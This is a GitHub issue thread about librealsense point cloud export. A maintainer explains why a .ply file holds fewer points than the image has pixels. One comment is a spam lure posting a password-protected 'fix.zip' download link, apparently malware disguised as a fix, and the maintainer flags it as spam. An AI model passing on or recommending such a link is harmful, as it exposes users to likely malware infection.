realsenseai/librealsense #13301: .ply file does not have same number of coordinate as the number of pixels in depth or color image

TaKuSaInc, 2024-08-28:
I'm using Intel Realsense d435 for generating point cloud. I'm storing the point cloud using the standard code

pts = pc.calculate(depth_frame)
pc.map_to(color_frame)
pcloud = "pCloud1ply"
pts.export_to_ply(pcloud, color_frame);

Problem is that the number of the points in ply file is not equal to the number of pixel in color or depth image. What I'm trying to do is to get the xyz coordinate of any point from the point cloud. So when I'm reading the ply file using

cloud = PyntCloud.from_file("pCloud1.ply");

It does not have all the points. So, I can't understand how to map the xyz value to corresponding pixel value

chenshupe, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MartyG-RealSense, 2024-08-28:
Hi @TaKuSaInc  Please ignore the comment above, it is an automated spam message.

MartyG-RealSense, 2024-08-28:
Are you using C++ or Python code for your ply export script, please?

TaKuSaInc, 2024-08-28:
python

MartyG-RealSense, 2024-08-28:
Pyrealsense2 typically has problems with exporting color to a .ply file.  The method in a script at https://github.com/IntelRealSense/librealsense/issues/6194#issuecomment-608371293 is one of the only methods that has been confirmed to work.

Even if you have a successfully working export script though, it is normal for a 3D pointcloud image to have holes and gaps, so the number of points on the pointcloud will not match up to the number of pixels in a depth or color image resolution.  This principle is illustrated by the RealSense SDK's **rs-pointcloud** example program that uses the same pc.calculate and map_to method of pointcloud generation as your script.

https://github.com/IntelRealSense/librealsense/tree/master/examples/pointcloud

[image]

TaKuSaInc, 2024-08-28:
so what should I do if I want to store only xyz coordinate for each pixel in realtime video feed which I can access later. Because storing directly xyz value in some file in realtime is crashing my python programm

MartyG-RealSense, 2024-09-05:
Hi @TaKuSaInc  Do you require further assistance with this case, please?   Thanks!

TaKuSaInc, 2024-09-11:
My problem is resolved . Thanks for your help.

MartyG-RealSense, 2024-09-11:
You are very welcome, @TaKuSaInc - I'm pleased that I could help.  Thanks very much for the update!

closed 2024-09-11 by MartyG-RealSense